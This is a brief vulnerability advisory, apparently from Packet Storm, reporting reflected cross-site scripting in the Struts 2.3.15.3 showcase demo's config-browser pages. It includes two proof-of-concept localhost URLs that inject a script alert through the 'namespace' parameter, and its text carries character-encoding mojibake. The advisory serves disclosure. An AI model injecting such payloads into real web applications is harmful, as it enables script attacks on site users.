Struts 2.3.15.3 Cross Site Scripting

2013-10-28T00:00:00
ID PACKETSTORM:123805
Type packetstorm
Reporter Nebula
Modified 2013-10-28T00:00:00

Description

                                        
                                            `*Abstract£º*  
  
The latest version of the current official  
struts-2.3.15.3£¬struts2-showcase.war demo XSS still exist!  
  
*Details£º*  
  
I found an update of the official demo of Strust2, so I did a test. It used  
to be able to filter, escape input and escape output, but why didn¡¯t it  
escape this time?  
  
*Proofs of concept£º*  
  
Two demo addresses¡¯ namespacec parameters were not solved:  
  
http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace=  
<script>alert(/xss/);</script>  
  
http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace=  
<script>alert(/xss/);</script>&actionName=showcase  
  
[image: ÄÚǶͼƬ 2][image: ÄÚǶͼƬ 3]  
  
`